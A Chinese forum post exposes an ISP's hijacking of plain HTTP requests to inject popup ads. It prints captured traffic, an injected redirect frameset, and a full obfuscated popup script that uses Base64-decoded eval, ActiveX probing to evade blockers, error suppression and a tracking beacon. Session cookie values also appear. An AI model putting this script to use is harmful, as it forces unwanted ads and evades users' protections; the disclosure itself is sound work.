我访问网站甲
[url]http://im.qq.com/jh/[/url]
602 bytes sent to 219.134.128.12:80
GET /jh/ HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)Host: im.qq.comConnection: Keep-AliveCookie: pvid=undefined; verifysession=462d275b013bb7edc97cc1b7d05e7ff2f5dcae8283b40c1a42c6b65ed603e72b; jp_session=1d8a81cf45c4a6cc68747470733a2f2f70617373776f72642e71712e636f6d2f6367692d62696e2f686a5f72656469726563743f773d31
返回了劫持后的数据:530 bytes received by ***.***.***.***:3703
HTTP/1.1 200 OKContent-type: text/html
<!--
  Reviewer note (annotation, not part of the captured response).
  This body arrived with "HTTP/1.1 200 OK" in place of the page requested over plain HTTP on port 80.
  1. The inline script reads parent.window.location.href inside try/catch and reloads the page
     if that access throws.
  2. The frameset's load handler sets frame "lxmainframe" to
     http://202.96.82.55/fx91/ifx91.html?url= followed by the current window.location, so the
     originally requested URL is handed on as the "url" query value.
  3. In this copy the handler attribute name is spelled with non-ASCII look-alike characters in
     place of the Latin "o" (presumably substituted by the site hosting the post; TODO confirm
     against the raw capture).
  4. The quoted response carries only a Content-type header, with no Date, Server or
     Content-Length, unlike the Apache response later in the same capture. That difference is
     one observable sign of a substituted response.
-->
<html><meta http-equiv='Pragma' content='no-cache'><head><title></title><script LangUage='JavaScript'>try{var tmp=parent.window.location.href}catch(e){window.location.reload();}</script></head><frameset framespacing=0 border=0 rows='*,0' frameborder=0 οnlοad="window.lxmainframe.location='http://202.96.82.55/fx91/ifx91.html?url='+window.location;"><frame name='lxmainframe' src='about:blank' scrolling='auto'><frame name='lxblankframe' src='about:blank' scrolling='no'></frameset></html>
然后自动转向:
[url]http://202.96.82.55/fx91/ifx91.html?url=http://im.qq.com/jh/[/url]
GET /fx91/ifx91.html?url=http://im.qq.com/jh/ HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Referer: [url]http://im.qq.com/jh/[/url]Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)Host: 202.96.82.55Connection: Keep-Alive
最后取得的代码,居然用gzip压缩(Content-Encoding: gzip 是压缩,不是加密),解压后为:HTTP/1.1 200 OKDate: Sun, 03 Feb 2007 05:18:10 GMTServer: Apache/2.0.54 (Unix) PHP/4.4.1Last-Modified: Tue, 19 Dec 2006 05:56:26 GMTETag: "400002-1c64-c2365680"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 3419Connection: closeContent-Type: text/html; charset=GB2312
<!--
  Reviewer note (annotation, not part of the captured response).
  The listing below is shown with extra spaces around most tokens, including inside string
  literals and the regular expression, presumably added by the hosting site's code formatter,
  so read it for structure rather than as runnable code.
  1. QueryString(fieldName) pulls a value out of document.location.search; the value for "url"
     is assigned to frames['fulliframe'].location with no validation visible here, so the page
     the user asked for is shown inside a full-size iframe.
  2. The last statements call fStart() with http://dm91.kulong8.com/120shop.htm and a
     height=600,width=800 feature string, then pop.blur() and window.focus(), which leaves
     the new window behind the current one.
  3. fV6() is a hand-written Base64 decoder. Its output is passed to document.write (fV13),
     innerHTML (fV16, fV19) and eval (fV22, fV9), so the markup and script that would actually
     run are not visible in the literal text; decode the strings offline when analysing.
  4. fV30, fV29 and fV33 create object elements with fixed classid values, set flags from
     onreadystatechange handlers, and then branch to fV16, fV26 or fV28; this looks like probing
     for installed components to choose an alternative window-opening path (inferred, confirm
     by decoding the strings).
  5. oV1.onerror is set to fV5, which always returns true, so script errors are not surfaced
     while these paths are tried. fV7 also sets body.onclick to call fV8(oV1.open, 3).
-->
< html > < head > < title ></ title > < meta http-equiv ="Content-Type" content ="text/html; charset=gb2312" > < style type ="text/css" > <!--body { margin : 0px ; padding : 0px ; overflow : hidden ; } --> </ style > < script language ="javascript" > function QueryString(fieldName){ var urlString = document.location.search; if (urlString != null ) { var typeQu = fieldName + " = " ; var urlEnd = urlString.indexOf(typeQu); if (urlEnd != - 1 ) { var paramsUrl = urlString.substring(urlEnd + typeQu.length); var isEnd = paramsUrl.indexOf( ' & ' ); if (isEnd != - 1 ) { return paramsUrl.substring( 0 , isEnd); } else { return paramsUrl; } } else return null ; } else return null ;} var url = QueryString( " url " ); </ script > </ head > < body > < iframe id ="fulliframe" LANG ="utf-8" name ="fulliframe" src ="" width ="100%" height ="100%" marginheight ="0" marginwidth ="0" frameborder ="0" ></ iframe > <!-- START IFRAME LOADING --> < script language ="JavaScript" type ="text/javascript" > frames[ ' fulliframe ' ].location = url; </ script > <!-- END IFRAME LOADING --> < SCRIPT LANGUAGE ="javascript" > oV1 = window; function fStart(u,n,v) { if ( ! oV1.opera) { var twin = oV1.open(u,n,v); oV1.focus(); } if ( ! window.fV1) {fV13();} var w = oV2(u,n,v); var wo = vWA[w]; wo.pw = twin; fV3( " fV10( " + w + " ) " , 100 ); return wo; } function fV11() { return fV6(vV1);} function fV5(x) { return true ; } function oV2(u,n,v) { var c = vWA.length; vWA[c] = new Array; var cw = vWA[c]; var tn = new Date(); if ( ! v) var v = '' ; if ( ! n) var n = tn.getTime(); cw.location = u; cw.f = 1 ; cw.s = 0 ; cw.n = n; cw.v = v; cw.cn = "" ; cw.cnt = c; cw.blur = function () {cw.f =- 1 ;}; cw.focus = function () {cw.f = 1 ;}; return c } function fV13() { oV5 = oV1.document; vWA = new Array; fV1 = oV1.open; fV2 = oV1.focus; fV3 = setTimeout; fV4 = clearTimeout; vV1 = ' PE9CSkVDVCBJRD0nb1Y0JyBkYXRhPScvZmF2aWNvbi5pY28nIHR5cGU9J2FwcGxpY2F0aW9uL3htbCc+PC9PQkpFQ1Q+ ' ; fV20 = (document.all &&! 
oV1.opera) ? 1 : 0 ; isG = fV31 = fV32 = 0 ; fV21 = fV20 ? (navigator.appVersion.indexOf( ' NT 5.1 ' ) > 0 ): 0 ; fV34 = fV20 ? (navigator.appVersion.indexOf( ' MSIE 7 ' ) > 0 ): 0 ; oV5.write(fV6( ' PGlucHV0IHN0eWxlPSJ3aWR0aDowcHg7IHRvcDowcHg7IHBvc2l0aW9uOmFic29sdXRlOyB2aXNpYmlsaXR5OmhpZGRlbjsiIGlkPSJvVjYiIG9uY2hhbmdlPSJmVjgoZlYxLDUsdHJ1ZSkiPg== ' )); oV5.write(fV6( ' PGRpdiBpZD0ib1YxMCI+PC9kaXY+ ' )); } function debug() { void ( 0 )} function fV6(input) { var o = "" ; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0 ; var keyStr = " ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/= " ; input = input.replace( / [ ^ A - Za - z0 - 9 + / = ] / g, "" ); do { enc1 = keyStr.indexOf(input.charAt(i ++ )); enc2 = keyStr.indexOf(input.charAt(i ++ )); enc3 = keyStr.indexOf(input.charAt(i ++ )); enc4 = keyStr.indexOf(input.charAt(i ++ )); chr1 = (enc1 << 2 ) | (enc2 >> 4 ); chr2 = ((enc2 & 15 ) << 4 ) | (enc3 >> 2 ); chr3 = ((enc3 & 3 ) << 6 ) | enc4; o = o + String.fromCharCode(chr1); if (enc3 != 64 ) { o = o + String.fromCharCode(chr2); } if (enc4 != 64 ) { o = o + String.fromCharCode(chr3); } } while (i < input.length); return o; } function fV12() { if ( -- fV25 < 1 ) return ; oV1.onerror = fV5; var t = fV3( ' fV12() ' , 500 ); oV1.wO1 = oV3.oV4.object.parentWindow; oV3.location = fV6( ' YWJvdXQ6Ymxhbms= ' ); fV3( ' fV8(wO1.open,2) ' , 200 ); fV4(t); } function fV17() { if ( -- fV25 < 1 ) { fV25 = 25 ; var t = fV3( ' fV12() ' ); return ; } var x = fV3( ' fV17() ' , 250 ); oV1.fV14 = oV8.children[ 0 ].parentWindow; fV1 = fV14.open; fV4(x); oV8.removeChild(oV8.children[ 0 ]); oV5.all[ ' oV6 ' ].fireEvent( ' onchange ' ); } function fV16() { z = createPopup(); oV8 = z.document.body; oV8.innerHTML = fV6(vV1); fV25 = 5 ; fV3( ' fV17() ' , 200 ); } function fV19(v) { if (oV5.getElementById( ' oV10 ' )) { oV5.getElementById( ' oV10 ' ).innerHTML = v; } else { var o = oV5.createElement( " span " ); o.innerHTML = v; o.style.visibility = " visible " ; 
oV5.body.appendChild(o); } } function fV23() { fV8(fV1, 4 ); } function fV22() { if ( -- fV25 == 0 ) {fV21 = 0 ; fV7(); return ;} var wo = vWA[ 0 ]; var x = fV3( ' fV22() ' , 750 ); var o = fV24( ' oV9 ' ); if (o.DOM) { wo.s =- 1 ; fV4(x); fV25 = 1 ; eval(fV6( " dmFyIG91dD0ic2hvd01vZGFsRGlhbG9nKCdqYXZhc2NyaXB0OndpbmRvdy5vbmVycm9yPWZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9OyBzZXRUaW1lb3V0KFwid2luZG93LmNsb3NlKClcIiw1MCk7IHg9d2luZG93Lm9wZW4oXCJhYm91dDpibGFua1wiLFwiIiArIHdvLm4gKyAiXCIsXCIiICsgd28udiArICJcIik7ICB4LmJsdXIoKTsgd2luZG93LmNsb3NlKCknLCcnLCdoZWxwOjA7Y2VudGVyOjA7ZGlhbG9nV2lkdGg6MTtkaWFsb2dIZWlnaHQ6MTtkaWFsb2dMZWZ0OjUwMDA7ZGlhbG9nVG9wOjUwMDA7Jyk7Ijsgby5ET00uU2NyaXB0LmV4ZWNTY3JpcHQob3V0KTsg " )); wo.s = 0 ; fV2(); fV3( ' fV23() ' ); } } function fV28() { fV19(fV6( ' PG9iamVjdCBpZD0ib1Y5IiBvbmVycm9yPSJmVjI1PTEiIHN0eWxlPSJwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0OjE7dG9wOjE7d2lkdGg6MTtoZWlnaHQ6MSIgY2xhc3NpZD0iY2xzaWQ6MkQzNjAyMDEtRkZGNS0xMWQxLThEMDMtMDBBMEM5NTlCQzBBIj48U0NSSVBUPmZWMjU9MTwvU0NSSVBUPjwvb2JqZWN0Pg== ' )); fV25 = 6 ; fV3( ' fV22() ' , 500 ) } function fV26() { fV19(fV6( ' PElGUkFNRSBpZD0ib1YzIiBOQU1FPSJvVjMiIFNUWUxFPSJ2aXNpYmlsaXR5OmhpZGRlbjsgcG9zaXRpb246YWJzb2x1dGU7d2lkdGg6MTtoZWlnaHQ6MTsiIHNyYz0iamF2YXNjcmlwdDpwYXJlbnQuZlYxMSgpIj48L0lGUkFNRT4= ' )); fV25 = 20 ; fV3( ' fV12() ' , 200 ); } function fV30() { fV3( ' fV32?fV29():fV28() ' ); var o = document.createElement( ' object ' ); o.onreadystatechange = function (){fV32 = 1 }; o.classid = ' clsid:D2BD7935-05FC-11D2-9059-00C04FD7A1BD ' ; o.onreadystatechange = function (){fV32 = 0 }; } function fV29() { fV3( ' fV31?fV28():fV33() ' ); var o = document.createElement( ' object ' ); o.onreadystatechange = function (){fV31 = 1 }; o.classid = ' clsid:9E30754B-29A9-41CE-8892-70E9E07D15DC ' ; o.onreadystatechange = function (){fV31 = 0 }; } function fV33() { fV3( ' isG?fV16():fV26(); ' ); var o = document.createElement( ' object ' ); o.onreadystatechange = function (){isG = 1 }; o.classid = ' 
clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB ' ; o.onreadystatechange = function (){isG = 0 }; } function fV7() { oV5.body.onclick = function () {fV8(oV1.open, 3 )}; if (oV5.createElement) { fV24 = oV5.getElementById; if (fV34) fV21 = 0 ; if (fV20) { if (fV21) { fV30(); } else { fV33(); } } else { out = ' <embed swliveconnect="true" src="" width="1" height="1"> ' ; fV19(out); if ( ! oV5.all) { x = oV5.getElementById( ' oV6 ' ); x.focus(); x.value = Math.random(); } } } } function fV8(f,t,y) { for ( var i = 0 ;i < vWA.length;i ++ ) if (vWA[i].s == 0 ) { vWA[i].s =- 1 ; var wo = vWA[i]; wo.pw = f(wo.location,wo.n,wo.v); fV3( " var i= " + i + " ; var wo=vWA[i]; if(wo.s==-1){wo.s=0} " ); fV9(wo,t); } } function fV9(wo,s) { if ( ! s) s = 0 ; if (wo.s > 1 ) return ; if (s == 0 ) var t = fV3( " fV7() " , 500 ); if (s == 4 ) var t = fV3( ' fV33() ' , 500 ); if (s == 5 && isG) var t = fV3( ' fV26() ' , 200 ); oV1.onerror = fV5; if (wo.pw) { if ( ! oV1.opera) {wo.f ==- 1 ? wo.pw.blur():wo.pw.focus();} wo.s = 2 ; fV2(); fV4(t); eval(fV6( ' CQlpZiAoMSArIE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDEwMCkgPCA2KSB7DQoJCQl2YXIgeD1uZXcgSW1hZ2UoKTsNCgkJCXguc3JjPSdodHRwOi8vd3d3LmFkb3V0cHV0LmNvbS92ZXJzaW9uMi9oaXRfcm0uY2ZtP3R5cGU9JyArIHM7DQoJCX0= ' )); oV1.onerror = null ; } } function fV10(w) { if (oV1.opera && ! fV20) {fV7(); return ;} wo = vWA[w]; fV9(wo); } var l = (screen.width - 720 ) / 2 ; var t = (screen.height - 300 ) / 2 ; var pop = fStart( ' http://dm91.kulong8.com/120shop.htm ' , '' , ' height=600,width=800,left= ' + l + ' ,top= ' + t + ' ,toolbar=1,status=1,menubar=1,location=1,scrollbars=1,resizable=1 ' );pop.blur();window.focus(); </ SCRIPT > </ BODY > </ HTML >
以上弹窗代码凶悍异常,ggtoolbar拦截不住。
现在出现过的弹窗大概3种,一是有问必答网,一是健康商城,最近又多出来一个6room.
伟大的网通,让我们交钱看广告,真是前无古人,后无来者。